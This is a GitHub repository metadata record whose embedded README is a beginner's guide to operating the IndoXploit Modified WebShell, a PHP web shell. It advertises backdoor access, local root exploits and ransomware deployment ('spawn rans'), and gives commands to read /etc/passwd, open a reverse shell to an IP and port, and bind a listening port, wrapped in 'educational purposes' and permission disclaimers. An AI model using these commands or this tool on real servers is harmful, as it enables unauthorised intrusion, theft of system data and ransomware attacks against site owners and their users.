{"id":26933337,"url":"https://github.com/rootshelll/indoxploit-webshell","last_synced_at":"2025-06-24T13:31:54.563Z","repository":{"id":280289575,"uuid":"941524850","full_name":"RootShelll/indoxploit-WebShell","owner":"RootShelll","description":"Learn how to use the IndoXploit Modified WebShell. A detailed guide for beginners, including features, commands, and practical examples.","archived":false,"fork":false,"pushed_at":"2025-03-02T14:26:14.000Z","size":344,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-02T09:18:37.774Z","etag":null,"topics":["cybersecurity-abilities","exploits","file-manager","indoxploit","indoxploit-commands","indoxploit-webshell","reverse-shell","webshell","webshell-guide"],"latest_commit_sha":null,"homepage":"https://r00t-shell.com/indoxploit-modified-webshell-features-usage-and-guide/","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RootShelll.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-03-02T13:59:37.000Z","updated_at":"2025-03-05T11:11:03.000Z","dependencies_parsed_at":"2025-03-02T15:29:01.222Z","dependency_job_id":null,"html_url":"https://github.com/RootShelll/indoxploit-WebShell","commit_stats":null,"previous_names":["rootshelll/indoxploit-webshell"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RootShelll/indoxploit-WebShell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2Findoxploit-WebShell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2Findoxploit-WebShell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2Findoxploit-WebShell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2Findoxploit-WebShell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RootShelll","download_url":"https://codeload.github.com/RootShelll/indoxploit-WebShell/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2Findoxploit-WebShell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":261685544,"owners_count":23194125,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity-abilities","exploits","file-manager","indoxploit","indoxploit-commands","indoxploit-webshell","reverse-shell","webshell","webshell-guide"],"created_at":"2025-04-02T09:18:40.692Z","updated_at":"2025-06-24T13:31:54.533Z","avatar_url":"https://github.com/RootShelll.png","language":"PHP","readme":"# IndoXploit Modified WebShell: A Comprehensive Guide\n\n![IndoXploit Image](https://r00t-shell.com/wp-content/uploads/2025/03/indoxploit-WebShell.png)\n\n\u003e **Note**: This guide is intended for educational purposes and should only be used responsibly by individuals with permission to access the system.\n\n---\n\n**IndoXploit Modified WebShell** is a powerful tool designed for advanced web management and penetration testing. This guide will walk you through its features, commands, and practical usage. 🚀\n\n---\n\n## 📌 What is IndoXploit Modified WebShell?\n\nThe IndoXploit Modified WebShell is a web-based shell ability that allows users to execute commands, manage files, and perform various tasks on a server. It is commonly used by cybersecurity professionals for testing and managing web servers. However, **it should be used responsibly and only on systems you own or have explicit permission to test.** 🔐\n\n---\n\n## ⚙️ Key Features\n\n- **File Management**: Read, create, and manage files on the server. 📂\n- **Reverse Shell**: Establish a backdoor connection to the server. 🔄\n- **Exploitation Abilities**: Includes local root exploits, ransomware, and more. 💥\n- **System Information**: Retrieve PHP version, file system details, and more. 🖥️\n- **Custom Commands**: Execute various pre-defined commands for specific tasks. 🧑‍💻\n\n---\n\n## 📝 How to Use IndoXploit Modified WebShell\n\nBelow is a step-by-step guide on how to use the IndoXploit WebShell effectively:\n\n---\n\n### 1. Reading Files 📖\n\nTo read a file, use the following command:\n\n```bash\nrf [filename]\n```\n\nExample:\n\n```bash\nrf /etc/passwd\n```\n\n---\n\n### 2. Spawning Files 🔨\n\nUse the `spawn` command to create various types of files or execute backdoor commands:\n\n- `spawn webconsole` – Execute command backdoor.\n- `spawn cgitelnet1` – CGI Telnet Shell 1.\n- `spawn rans` – Deploy ransomware.\n- `spawn phpinfo` – Retrieve PHP system information.\n\n---\n\n### 3. Reverse Shell (Backconnect) 🔁\n\nTo establish a reverse shell connection, use the following syntax:\n\n```bash\nrvr bc [IP] [PORT] [TYPE]\n```\n\nExample:\n\n```bash\nrvr bc 127.0.0.1 1337 bash\n```\n\n---\n\n### 4. Binding Ports 🔒\n\nTo bind a port, use the following syntax:\n\n```bash\nrvr bp [PORT] [TYPE]\n```\n\nExample:\n\n```bash\nrvr bp 1337 perl\n```\n\n---\n\n### 5. Logging Out 🚪\n\nTo log out from the shell, use the command:\n\n```bash\nlogout\n```\n\n---\n\n## ⚠️ Best Practices and Warnings\n\nWhile using the IndoXploit WebShell, keep the following in mind:\n\n- Always use this ability responsibly and **only on systems you have permission to access**.\n- Ensure your activities comply with local laws and regulations. ⚖️\n- Regularly update your abilities to avoid vulnerabilities. 🔐\n\n---\n\n## 📚 Conclusion\n\nThe IndoXploit Modified WebShell is a versatile tool for **web server management and penetration testing**. By following this guide, you can effectively utilize its features while adhering to ethical practices. 🌐\n\n---\n\n## 🚨 Warning\n\nThis tool should **ONLY** be used in environments where you have **explicit permission**. Unauthorized access or testing can be illegal and unethical.\n\n---\n\n\n### 💬 Feedback and Contributions\n\nFeel free to fork, contribute, or open issues in the repository! 🔄  \nFor further queries, you can reach out via [help@r00t-shell.com](mailto:help@r00t-shell.com).\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frootshelll%2Findoxploit-webshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frootshelll%2Findoxploit-webshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frootshelll%2Findoxploit-webshell/lists"}